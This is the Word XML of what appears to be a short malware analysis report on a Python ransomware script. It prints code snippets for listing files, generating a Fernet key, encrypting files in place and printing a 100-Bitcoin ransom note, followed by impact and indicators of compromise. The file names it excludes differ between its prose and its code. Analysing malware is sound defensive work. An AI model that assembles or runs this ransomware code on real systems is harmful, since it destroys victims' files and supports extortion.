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3467A" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="003202BC" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Malware Analysis Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10439D5A" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="003202BC" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Malware Name: Ransomware (Python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF82FCF" w14:textId="60B66E8A" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>File Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B17592">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Analysis Date:</w:t>
      </w:r>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> March 2024</w:t>
      </w:r>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Author/Source:</w:t>
      </w:r>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B17592">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Saurabh Singh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B17592">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Shekhawat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="284ECED3" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="0007443A" w:rsidP="00BB75C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7F11FA91">
          <v:rect id="_x0000_i1032" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72613816" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="003202BC" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>1. Malware Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B1901E" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">This Python script is identified as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve"> variant that encrypts files in the current directory and demands a ransom payment. It uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fernet encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve"> system from the cryptography library to encrypt files and store the encryption key in a file named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>mykey.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">. The script then prints a ransom note demanding </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>100 Bitcoins</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve"> within 24 hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F28692" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="0007443A" w:rsidP="00BB75C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6FC67C51">
          <v:rect id="_x0000_i1031" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5721674E" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="003202BC" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Malware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3784F420" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">The following are the key </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>behaviors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve"> observed in the provided malware script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029652D6" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="003202BC" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>a. File Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF47BBC" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">The script scans the current working directory for files to encrypt. It skips files named mymalware.py, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>mykey.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>, and decrypt.py, presumably to avoid encrypting itself and the key file. All other files in the directory are added to the list of files to be encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3BCAA4" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D9E347" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F0CB46" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">for file in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>os.listdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB303E9" w14:textId="75020569" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">    if file == "</w:t>
      </w:r>
      <w:r w:rsidR="00B17592">
        <w:t>encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>.py" or file == "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>mykey.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>" or file == "decrypt</w:t>
      </w:r>
      <w:r w:rsidR="00B17592">
        <w:t>ion</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>.py":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A9E66D" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">        continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F9A2D6" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>os.path.isfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>(file):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E8D146" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>files.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>(file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B122A1" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="003202BC" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>b. Key Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A36CE" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">The script generates a random encryption key using </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fernet</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">. The key is saved in the file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>mykey.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve"> for later decryption (potentially by the attacker). The encryption key is also used to encrypt all selected files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30655F25" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFFCDE8" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8B1159" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">key = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>Fernet.generate_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75257BE4" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t>with open("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>mykey.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>wb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">") as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>mykey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0EBDA2" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>mykey.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628DC797" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="003202BC" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>c. File Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742EE097" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t>For each file in the directory (other than the excluded ones), the contents are read, encrypted with the generated Fernet key, and then the encrypted content is written back to the file, rendering it unreadable without the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456B00E8" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350EAE75" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4780BE" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t>for file in files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4522C261" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">    with open(file, "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">") as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>thefile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6187D668" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">        contents = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>thefile.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33394573" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>contents_encrypted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve"> = Fernet(key).encrypt(contents)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372A154F" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">    with open(file, "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>wb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">") as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>thefile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64804AF1" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>thefile.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>contents_encrypted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C7F830" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="003202BC" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>d. Ransom Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A890DDA" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t>After completing the encryption process, the script prints a ransom note, demanding a payment of 100 Bitcoins within 24 hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E51174" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDB5DE3" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ADC9FF" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t>print("You have been hacked!!! Send me 100 Bitcoins in 24 Hours")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442B1148" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="0007443A" w:rsidP="00BB75C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2C9C2224">
          <v:rect id="_x0000_i1030" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4342C23C" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="003202BC" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>3. Potential Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732251C8" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File Loss</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>: The files encrypted by this malware become unreadable without the decryption key. If the decryption key is lost or not provided by the attacker, the files are permanently encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A86BA2" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ransom Demand</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>: The malware author demands a high-value ransom (100 Bitcoins), which amounts to a significant monetary loss if the victim complies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0635D0A4" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="0007443A" w:rsidP="00BB75C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7CD69C83">
          <v:rect id="_x0000_i1029" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5991CC30" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="003202BC" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>4. Indicators of Compromise (IOCs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49533883" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Malware Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve"> mymalware.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ABC2B9" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ransom Note Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve"> "You have been hacked!!! Send me 100 Bitcoins in 24 Hours"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1059F17A" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key File:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>mykey.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
